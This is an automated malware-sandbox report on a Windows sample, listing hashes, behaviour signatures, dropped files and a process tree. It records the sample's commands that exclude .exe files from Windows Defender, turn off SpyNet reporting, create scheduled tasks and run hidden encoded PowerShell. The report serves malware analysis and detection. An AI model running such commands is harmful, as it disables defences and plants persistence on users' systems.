Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
153s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30/10/2022, 07:18
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
85958167182b4b3c8371e07bf013c106
-
SHA1
43a324cb996b484b07cbb912b05bd40c1a269b86
-
SHA256
eecec3fe3c1ad913f535fd2d101b441faffc90973a7951e2673324041f439da4
-
SHA512
76cff807de7a6425812e7da38cb4f8f232b68746b6fd087ce6fb09e7259169d659e17e4968d440d767002763b739d0bc186ee67613cf23089650feffa9bea9bf
-
SSDEEP
196608:91O01nQ0bnj+fYrCohkD3T6o4BUpWet7KZ9IWU:3Os9n8hf6rBPetapU
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 63 3980 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 2964 Install.exe 4628 Install.exe 1488 OKStDaz.exe 2648 ZbyFFTD.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation ZbyFFTD.exe -
Loads dropped DLL 1 IoCs
pid Process 3980 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json ZbyFFTD.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json ZbyFFTD.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ZbyFFTD.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 ZbyFFTD.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol OKStDaz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ZbyFFTD.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F ZbyFFTD.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ZbyFFTD.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini OKStDaz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZbyFFTD.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZbyFFTD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 ZbyFFTD.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ZbyFFTD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ZbyFFTD.exe File created C:\Program Files (x86)\GUqtXLpkCnEU2\WAjjpvD.xml ZbyFFTD.exe File created C:\Program Files (x86)\DGyuesllMrTyYUlUupR\FVzfEAL.dll ZbyFFTD.exe File created C:\Program Files (x86)\XjmuJHxLjXQtC\UDDQLIX.xml ZbyFFTD.exe File created C:\Program Files (x86)\DGyuesllMrTyYUlUupR\nKpviZE.xml ZbyFFTD.exe File created C:\Program Files (x86)\XjmuJHxLjXQtC\UsFJTNI.dll ZbyFFTD.exe File created C:\Program Files (x86)\bHfaALlsU\OiwlFH.dll ZbyFFTD.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ZbyFFTD.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZbyFFTD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZbyFFTD.exe File created C:\Program Files (x86)\bHfaALlsU\kIvSMlz.xml ZbyFFTD.exe File created C:\Program Files (x86)\GUqtXLpkCnEU2\nOliZwtlkFBHP.dll ZbyFFTD.exe File created C:\Program Files (x86)\RjxgDONkleUn\pcCLYXc.dll ZbyFFTD.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\btUIxhnquogiJgiDhn.job schtasks.exe File created C:\Windows\Tasks\VOlfEanzNQbmEDmfi.job schtasks.exe File created C:\Windows\Tasks\KaswbVYNVAppCRz.job schtasks.exe File created C:\Windows\Tasks\CSoaXjyDtIeTBsrxa.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4964 schtasks.exe 5056 schtasks.exe 2728 schtasks.exe 4452 schtasks.exe 3116 schtasks.exe 3240 schtasks.exe 4472 schtasks.exe 1320 schtasks.exe 688 schtasks.exe 1812 schtasks.exe 716 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer ZbyFFTD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket ZbyFFTD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ZbyFFTD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ZbyFFTD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" ZbyFFTD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ZbyFFTD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" ZbyFFTD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ZbyFFTD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" ZbyFFTD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\NukeOnDelete = "0" ZbyFFTD.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 1128 powershell.EXE 1128 powershell.EXE 1640 powershell.exe 1640 powershell.exe 3056 powershell.exe 3056 powershell.exe 3092 powershell.EXE 3092 powershell.EXE 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe 2648 ZbyFFTD.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1128 powershell.EXE Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeDebugPrivilege 3092 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5032 wrote to memory of 2964 5032 file.exe 80 PID 5032 wrote to memory of 2964 5032 file.exe 80 PID 5032 wrote to memory of 2964 5032 file.exe 80 PID 2964 wrote to memory of 4628 2964 Install.exe 81 PID 2964 wrote to memory of 4628 2964 Install.exe 81 PID 2964 wrote to memory of 4628 2964 Install.exe 81 PID 4628 wrote to memory of 216 4628 Install.exe 83 PID 4628 wrote to memory of 216 4628 Install.exe 83 PID 4628 wrote to memory of 216 4628 Install.exe 83 PID 4628 wrote to memory of 3604 4628 Install.exe 85 PID 4628 wrote to memory of 3604 4628 Install.exe 85 PID 4628 wrote to memory of 3604 4628 Install.exe 85 PID 216 wrote to memory of 3512 216 forfiles.exe 87 PID 3604 wrote to memory of 4968 3604 forfiles.exe 88 PID 3604 wrote to memory of 4968 3604 forfiles.exe 88 PID 216 wrote to memory of 3512 216 forfiles.exe 87 PID 3604 wrote to memory of 4968 3604 forfiles.exe 88 PID 216 wrote to memory of 3512 216 forfiles.exe 87 PID 3512 wrote to memory of 4868 3512 cmd.exe 89 PID 3512 wrote to memory of 4868 3512 cmd.exe 89 PID 3512 wrote to memory of 4868 3512 cmd.exe 89 PID 4968 wrote to memory of 4336 4968 cmd.exe 90 PID 4968 wrote to memory of 4336 4968 cmd.exe 90 PID 4968 wrote to memory of 4336 4968 cmd.exe 90 PID 4968 wrote to memory of 3036 4968 cmd.exe 91 PID 4968 wrote to memory of 3036 4968 cmd.exe 91 PID 4968 wrote to memory of 3036 4968 cmd.exe 91 PID 3512 wrote to memory of 1428 3512 cmd.exe 92 PID 3512 wrote to memory of 1428 3512 cmd.exe 92 PID 3512 wrote to memory of 1428 3512 cmd.exe 92 PID 4628 wrote to memory of 4472 4628 Install.exe 95 PID 4628 wrote to memory of 4472 4628 Install.exe 95 PID 4628 wrote to memory of 4472 4628 Install.exe 95 PID 4628 wrote to memory of 4576 4628 Install.exe 97 PID 4628 wrote to memory of 4576 4628 Install.exe 97 PID 4628 wrote to memory of 4576 4628 Install.exe 97 PID 1128 wrote to memory of 4160 1128 powershell.EXE 102 PID 1128 wrote to memory of 4160 1128 powershell.EXE 102 PID 4628 wrote to memory of 4344 4628 Install.exe 111 PID 4628 wrote to memory of 4344 4628 Install.exe 111 PID 4628 wrote to memory of 4344 4628 Install.exe 111 PID 4628 wrote to memory of 1320 4628 Install.exe 113 PID 4628 wrote to memory of 1320 4628 Install.exe 113 PID 4628 wrote to memory of 1320 4628 Install.exe 113 PID 1488 wrote to memory of 1640 1488 OKStDaz.exe 116 PID 1488 wrote to memory of 1640 1488 OKStDaz.exe 116 PID 1488 wrote to memory of 1640 1488 OKStDaz.exe 116 PID 1640 wrote to memory of 2648 1640 powershell.exe 118 PID 1640 wrote to memory of 2648 1640 powershell.exe 118 PID 1640 wrote to memory of 2648 1640 powershell.exe 118 PID 2648 wrote to memory of 2264 2648 cmd.exe 119 PID 2648 wrote to memory of 2264 2648 cmd.exe 119 PID 2648 wrote to memory of 2264 2648 cmd.exe 119 PID 1640 wrote to memory of 3280 1640 powershell.exe 120 PID 1640 wrote to memory of 3280 1640 powershell.exe 120 PID 1640 wrote to memory of 3280 1640 powershell.exe 120 PID 1640 wrote to memory of 3300 1640 powershell.exe 121 PID 1640 wrote to memory of 3300 1640 powershell.exe 121 PID 1640 wrote to memory of 3300 1640 powershell.exe 121 PID 1640 wrote to memory of 644 1640 powershell.exe 122 PID 1640 wrote to memory of 644 1640 powershell.exe 122 PID 1640 wrote to memory of 644 1640 powershell.exe 122 PID 1640 wrote to memory of 3004 1640 powershell.exe 123 PID 1640 wrote to memory of 3004 1640 powershell.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Users\Admin\AppData\Local\Temp\7zS659.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\7zSBA8.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3512 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4868
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1428
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4336
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:3036
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGnImqzhY" /SC once /ST 03:04:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGnImqzhY"4⤵PID:4576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGnImqzhY"4⤵PID:4344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btUIxhnquogiJgiDhn" /SC once /ST 08:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy\zFuvCIvdFPfOMYj\OKStDaz.exe\" hC /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1320
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4160
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3616
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3760
-
C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy\zFuvCIvdFPfOMYj\OKStDaz.exeC:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy\zFuvCIvdFPfOMYj\OKStDaz.exe hC /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1488 -
